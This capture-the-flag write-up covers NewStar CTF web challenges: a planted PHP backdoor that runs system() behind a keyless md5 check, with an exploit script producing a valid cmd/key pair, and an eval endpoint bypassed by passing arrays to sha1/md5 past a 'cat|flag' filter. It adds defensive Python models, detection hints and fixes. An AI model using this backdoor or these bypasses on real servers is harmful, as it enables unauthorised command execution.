New-Star-Ctf-[Week1&2-Web]

I heard the NewStar challenges are of high quality, so it was a pity not to have done them; I am now reproducing them on the xdu platform.

智械危机

robots.txt -> backd0or.php

<?php

function execute_cmd($cmd) {
    system($cmd);
}

function decrypt_request($cmd, $key) {
    $decoded_key = base64_decode($key);
    $reversed_cmd = '';
    for ($i = strlen($cmd) - 1; $i >= 0; $i--) {
        $reversed_cmd .= $cmd[$i];
    }
    $hashed_reversed_cmd = md5($reversed_cmd);
    if ($hashed_reversed_cmd !== $decoded_key) {
        die("Invalid key");
    }
    $decrypted_cmd = base64_decode($cmd);
    return $decrypted_cmd;
}

if (isset($_POST['cmd']) && isset($_POST['key'])) {
    execute_cmd(decrypt_request($_POST['cmd'], $_POST['key']));
}
else {
    highlight_file(__FILE__);
}
?>

Analysis: cmd and key are sent via POST, both are passed through decrypt_request, and the result goes to execute_cmd. So cmd is clearly the command we execute; next, look at the decrypt_request function.

$decoded_key is the base64 decoding of $key. $reversed_cmd = ''; first defines an empty string; $reversed_cmd then becomes $cmd reversed, and $hashed_reversed_cmd is the md5 of $reversed_cmd. The check requires $hashed_reversed_cmd == $decoded_key. The returned $decrypted_cmd is the base64 decoding of cmd, which is the command that actually gets executed.

Taking cat /f* as the final command, we work backwards and write an exp.

<?php
$decrypted_cmd = 'cat /f*';               // the final command chosen above
$cmd = base64_encode($decrypted_cmd);     // what the backdoor base64-decodes
$reversed_cmd = strrev($cmd);             // strrev reverses a string
$hashed_reversed_cmd = md5($reversed_cmd);
$decoded_key = $hashed_reversed_cmd;
$key = base64_encode($decoded_key);       // the backdoor base64-decodes $key before comparing

echo "cmd=$cmd&key=$key";
?>
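The security-relevant point of this backdoor is that the "key" is a pure function of the cmd parameter: no secret enters the computation, so the md5 check authenticates nothing. The following Python is an added example (not code from the challenge or from the original post) that re-implements the gate without executing anything, so you can check that a key derived from cmd alone always passes and that a key not derived that way is rejected. SAMPLE_CMD_B64 is a constructed value.

```python
import base64
import hashlib

# Constructed sample input: the base64 encoding of a harmless string.
SAMPLE_CMD_B64 = base64.b64encode(b"id").decode()


def derive_key(cmd_b64: str) -> str:
    """Compute the key the PHP backdoor expects: base64(md5(strrev(cmd))).

    Every input here is public (it is the same cmd the requester sends),
    which is exactly why the check provides no authentication.
    """
    reversed_cmd = cmd_b64[::-1]
    digest = hashlib.md5(reversed_cmd.encode()).hexdigest()
    return base64.b64encode(digest.encode()).decode()


def backdoor_accepts(cmd_b64: str, key: str) -> bool:
    """Mirror of decrypt_request()'s comparison, with no command execution.

    PHP compares md5(reversed cmd) with base64_decode(key) using !==.
    """
    try:
        decoded_key = base64.b64decode(key).decode(errors="replace")
    except (ValueError, UnicodeDecodeError):
        return False
    return hashlib.md5(cmd_b64[::-1].encode()).hexdigest() == decoded_key


def decoded_command(cmd_b64: str) -> str:
    """What execute_cmd() would receive once the gate has been passed."""
    return base64.b64decode(cmd_b64).decode()


if __name__ == "__main__":
    key = derive_key(SAMPLE_CMD_B64)
    print("derived key accepted:", backdoor_accepts(SAMPLE_CMD_B64, key))
    print("command that would run:", decoded_command(SAMPLE_CMD_B64))
```

For detection, the takeaway is that any request to this file carrying both cmd and key is an execution attempt; a web-server rule or log search for POSTs to backd0or.php is the cheapest indicator, and the real fix is to remove the file and rotate whatever credentials let it be planted.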

headache3

The flag is in the response headers.


会赢吗

Level 1: in the page source.

Level 2:

Can you type eight English sentences in one second?

Just write a script.

import requests
from bs4 import BeautifulSoup

# Target URLs
start_url = "http://127.0.0.1:60167/start"
submit_url = "http://127.0.0.1:60167/submit"

# Send the GET request to obtain the page and its cookie
response = requests.get(start_url)

# Extract the session cookie
session_cookie = response.cookies.get('session')

# Parse the HTML with BeautifulSoup and pull out the sentences to be typed
# (get_text() sends only the text, not the surrounding <p> tag)
soup = BeautifulSoup(response.text, 'html.parser')
text_paragraph = soup.find(id='text').get_text()

# Request headers
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36',
    'Referer': start_url,
    'Accept-Encoding': 'gzip, deflate, br, zstd',
    'Content-Type': 'application/x-www-form-urlencoded',
}

# POST form data
data = {
    'user_input': text_paragraph,
}

# Attach the session cookie to the request
cookies = {
    'session': session_cookie,
}

# Send the POST request
submit_response = requests.post(submit_url, headers=headers, data=data, cookies=cookies)

# Print the response body
print(submit_response.text)

遗失的拉链

www.zip source code leak.

<?php
error_reporting(0);
//for fun
if(isset($_GET['new'])&&isset($_POST['star'])){
    if(sha1($_GET['new'])===md5($_POST['star'])&&$_GET['new']!==$_POST['star']){
        // huh, why would sha1 and md5 be equal?
        $cmd = $_POST['cmd'];
        if (preg_match("/cat|flag/i", $cmd)) {
            die("u can not do this ");
        }
        echo eval($cmd);
    }else{
        echo "Wrong";

    }
}

Neither sha1 nor md5 can handle arrays; under the strict comparison both become NULL, so the two sides are equal. The next check is also an easy bypass.
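The root cause is a hash function silently returning NULL for a non-string argument, which then compares equal to the other side's NULL. The Python below is an added example, not the challenge's code: php7_hash is a model of the PHP 7 behaviour the post relies on (in PHP 8, md5() and sha1() raise a TypeError for an array argument instead, so this specific bypass is version-dependent), weak_check reproduces the gate as written, hardened_check shows the fix of rejecting non-scalar input before hashing, and array_params is a log-side indicator that flags array-form parameters (name[] or name[k]) sent to an endpoint that expects scalars. The parameter names and query strings are constructed for the example.

```python
import hashlib
from urllib.parse import parse_qs


def php7_hash(algo: str, value):
    """Model of PHP 7's md5()/sha1() on a non-string argument.

    PHP 7 emits a warning and returns NULL (None here) rather than a digest.
    This is an illustration of that semantics, not a PHP interpreter.
    """
    if not isinstance(value, str):
        return None
    return hashlib.new(algo, value.encode()).hexdigest()


def weak_check(new, star) -> bool:
    """The gate as written: sha1($new) === md5($star) && $new !== $star."""
    return php7_hash("sha1", new) == php7_hash("md5", star) and new != star


def hardened_check(new, star) -> bool:
    """Fix: validate types first, so NULL === NULL can never be reached.

    With real strings, a SHA-1 hex digest (40 chars) and an MD5 hex digest
    (32 chars) can never be identical, so the gate is then unpassable by design.
    """
    if not isinstance(new, str) or not isinstance(star, str):
        return False
    return weak_check(new, star)


def array_params(query: str) -> list:
    """Names of parameters submitted in PHP array form, e.g. new[]=1.

    Useful as a cheap detection signal on endpoints whose parameters are
    documented as scalars; a legitimate client has no reason to send them.
    """
    names = {k.split("[", 1)[0] for k in parse_qs(query, keep_blank_values=True) if "[" in k}
    return sorted(names)


if __name__ == "__main__":
    # Constructed inputs modelling new[]=1 (GET) and star[]=2 (POST).
    print("weak gate with two arrays:", weak_check(["1"], ["2"]))
    print("hardened gate with two arrays:", hardened_check(["1"], ["2"]))
    print("array-form params in 'new[]=1&page=2':", array_params("new[]=1&page=2"))
```

The same type guard generalises: any PHP comparison built on a function that degrades to NULL or an empty value on unexpected input (hash functions, strcmp, and similar) should be preceded by an is_string check, and array-form parameters in access logs for such endpoints are worth an alert.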
